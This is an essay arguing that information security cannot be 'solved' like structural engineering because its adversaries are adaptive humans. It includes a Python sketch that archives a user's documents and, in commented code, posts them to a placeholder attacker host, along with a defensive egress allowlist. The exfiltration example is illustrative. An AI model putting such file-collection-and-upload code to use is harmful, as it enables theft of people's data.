Human Adversaries: Why Information Security is Unlike Engineering
A common theme among information security commentators and keynote speakers is that infosec can, and either will or should, evolve to be more like structural engineering, product safety, or similarly successful fields. Facing an unending onslaught of breaches, we all wish we had the level of assurance and success that fields such as structural engineering, product safety, and public health have achieved, having all but eliminated the risk of dying in a commercial aircraft accident or from polio. Why don’t we follow the same process to stop getting hacked?
DO WE WANT OUR DAILY LIVES TO OPERATE LIKE A BATTLEFIELD, CONSTANTLY SURVEILLING FOR ATTACKERS AND FIGHTING THEM OFF, LIKELY WITH A LOT OF SECRECY?
OR DO WE WANT TO USE SAFE EQUIPMENT AND FOLLOW GOOD HYGIENE?
While I can empathize with the desire, fundamental differences exist between fields with human adversaries and those without, and those differences are easy to miss if you are unfamiliar with offensive operations. There are many ways to break down these differences, which I’ve summarized in the table below, but a simple way to think about it is that in fields without human adversaries (e.g., building bridges), once you have found a solution (make sure your cables can support the expected loads and stresses), you can standardize that solution and be basically done. If your bridge doesn’t fall down from its own weight, gravity isn’t going to change direction, pull it down sideways, or send a commando team to cut the suspension cables until it does fall down.
Would a Cyber-UL make us secure like UL makes us safe? Unlikely, but it might help a little.
In contrast, having human adversaries means your opposition is adaptable, intelligent, and goal-driven. These essential differences lead to tactical and strategic differences:
These differences basically boil down to three related ideas: unsolvability, keeping secrets, and intentionally taking unexpected actions.
UNSOLVABILITY

Unsolvability means that we cannot reach a final win state in which failures are impossible, or so rare they are unheard of, as we have against polio or in safe bridge-building. This comes not only from the persistence of human adversaries, but also from human vulnerability. Vulnerabilities can come from software errors, which will always be with us, but even if all software bugs and exploits disappeared, 95% of hacking groups would still be 99% as effective. Groups like the Desert Falcons operate just as effectively without exploits as other groups do with them.

As long as people can choose to run code that can both read data and communicate over the internet, they will be hacked in much the same way; and these core abilities will always be present, since without them you lose the benefits of using a computer in the first place. Social engineering attack vectors are often downplayed by technical experts who won’t fall for generic pretexts, but well-researched, well-timed, individualized attacks succeed against most users. Antivirus cannot solve the problem, since it is impossible to generically distinguish between good and bad software; silently exfiltrating all your files over an encrypted connection is exactly what legitimate backup applications do, after all. So mounting a successful attack will never be much harder than developing an average backup app.
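To make the backup-versus-exfiltration point concrete, here is a minimal Python sketch. The archiving logic is exactly what a legitimate backup tool runs and exactly what an exfiltration tool runs; only the upload destination differs, and both hostnames below are hypothetical placeholders.

```python
import io
import pathlib
import tarfile

def collect_files(root: str) -> bytes:
    """Bundle every file under `root` into an in-memory compressed tar archive.

    This is the core of a backup tool -- and, byte for byte, the core of an
    exfiltration tool. Nothing in the code reveals which one it is.
    """
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path in pathlib.Path(root).rglob("*"):
            if path.is_file():
                tar.add(path, arcname=str(path.relative_to(root)))
    return buf.getvalue()

# Uploading over TLS is a single POST either way; the only difference between
# the two tools is a string constant (hypothetical hosts shown):
#
#   import urllib.request
#   payload = collect_files("/home/user/documents")
#   req = urllib.request.Request("https://backup.example.com/store", data=payload)
#   # ...versus "https://attacker.example.com/store" -- identical client code.
#   urllib.request.urlopen(req)
```

No scanner can tell from this code alone whether the destination is trusted; that judgment depends entirely on context the software itself does not carry.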
Finally, even in the impossible case where there were no exploits and people could no longer run arbitrary code on computers, if users can type their passwords into the wrong site, click an OAuth button, recover lost account access, or reach their data and services from another computer in any other way, they will still be hacked, just like some of the most well-known celebrities. We can do much better than we have been doing, but we fool ourselves if we think we can get to a brush-your-teeth-and-you-are-good state without paying attention to what adversaries are doing. We can make safer equipment, but we must remain constantly vigilant, since there are no useful computers that are “safe equipment” against malicious attacks, and there never can be. Only the Amish have seen the end of cyberwar.
KEEPING SECRETS

In the engineering safety fields, there is no benefit to keeping any safety measures or procedures secret. Fields with human adversaries, such as the military, intelligence, and sports, also have many public and standard procedures, but they depend on secret measures as well. If the other team knows your game plan, they will be able to prepare for it and counteract it. This is why “Spygate” was such a controversy in football, and why signals are obfuscated, pitch selection is secret, and stealing signs is an issue in baseball.
In information security, if an incident responder tips their hand about a detection too soon, an alert adversary will be able to obfuscate or hide any activity using the detected malware, domain, or other indicators, and the defenders will be unable to track down nearly as many compromised nodes, malware modules, or exploits as before. Operational secrecy is essential at times since human adversaries will act on the information they can find, unlike non-human adversaries.
DOING THE UNEXPECTED
In fields without a human adversary, the steps required to ensure, for example, that a flight is safe, from filing the flight plan to checking the flaps, must be performed the same way each time to produce the same safe result. In fields with human adversaries, although some actions will be standardized, complete predictability is a recipe for failure. On virtually every football play, the offense must keep the defense on its toes: different running routes and receivers must remain options, because if the defense knew exactly where the QB would throw the ball, they would be able to cover the receiver and intercept the throw. This applies to defense as well as offense; for a top-notch defensive lineman like J.J. Watt to pressure or even sack the QB, he must dodge and spin to go somewhere the offensive line doesn’t expect, just like a pitcher in baseball, a defensive steal in basketball, or a defensive military strike.
In information security, those who have conducted offensive operations know that offensive groups will never send an attack they believe will be stopped by defensive measures. Whether it is a large-scale email malware campaign from a garden-variety criminal or a highly targeted intrusion by an intelligence agency, the authors will test their malware against all the security software they might encounter, modifying it until it is undetected by those public products.
Offense cannot win unless it does something unexpected, and likewise defense will never detect or stop the intrusion without doing something unexpected as well. It may be a custom application or network whitelist, private threat-intel sharing (if you’re lucky with your adversaries), non-standard configurations that block common social engineering vectors, or something else, but if your organization is going to stop common attacks, it needs to do something unexpected. To be extra clear: the debate is not, and has never been, about whether some standardization is useful, or even whether most things should be standardized; no one doubts that they should. The debate is about whether information security personnel should ever maintain operational secrecy or plan on taking unexpected actions.
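As one illustration of an unexpected, non-standard measure, here is a minimal sketch of a deny-by-default egress allowlist. The domain names are hypothetical placeholders, and a real deployment would enforce this in a proxy or firewall rather than in application code; the point is that an attacker who has not studied your specific allowlist cannot assume their callback domain will get out.

```python
# Hypothetical set of destinations this organization has explicitly approved.
ALLOWED_DOMAINS = {"backup.example.com", "updates.example.com"}

def egress_permitted(hostname: str) -> bool:
    """Deny by default: permit an outbound connection only if the hostname
    exactly matches, or is a subdomain of, an approved domain."""
    hostname = hostname.lower().rstrip(".")  # normalize case and trailing dot
    return any(
        hostname == domain or hostname.endswith("." + domain)
        for domain in ALLOWED_DOMAINS
    )
```

Malware calling home to an unlisted domain is blocked even if it evades every signature-based product, precisely because the attacker did not expect this particular restriction.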
The bottom line is that yes, it would be nice if information security were like those engineering and medical fields and did not have to deal with human adversaries. It would be nice if we could just use safe software, follow a checklist, and not worry about attacks, the same way we do not worry about whether a bridge will support us. It would be nice if adversaries did not adapt and specifically prepare attacks to bypass the most common defensive measures. It would be nice if attackers were just a disease, pest, or accident that we could vaccinate, spray, or certify away. But we have intelligent, adaptive, goal-driven, human adversaries. So let’s learn from the fields that have been dealing with them for centuries.